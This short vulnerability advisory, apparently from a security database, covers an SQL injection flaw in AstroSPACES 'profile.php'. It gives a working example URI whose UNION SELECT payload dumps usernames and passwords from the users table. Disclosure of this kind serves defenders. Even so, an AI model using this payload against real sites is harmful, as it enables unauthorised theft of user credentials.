|
AstroSPACES 'profile.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue. The following example URI is available: http://www.example.com/profile.php?action=view&id=160+AND+1=0+UNION+SELECT+ALL+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+users-- |
|
|
Privacy Statement |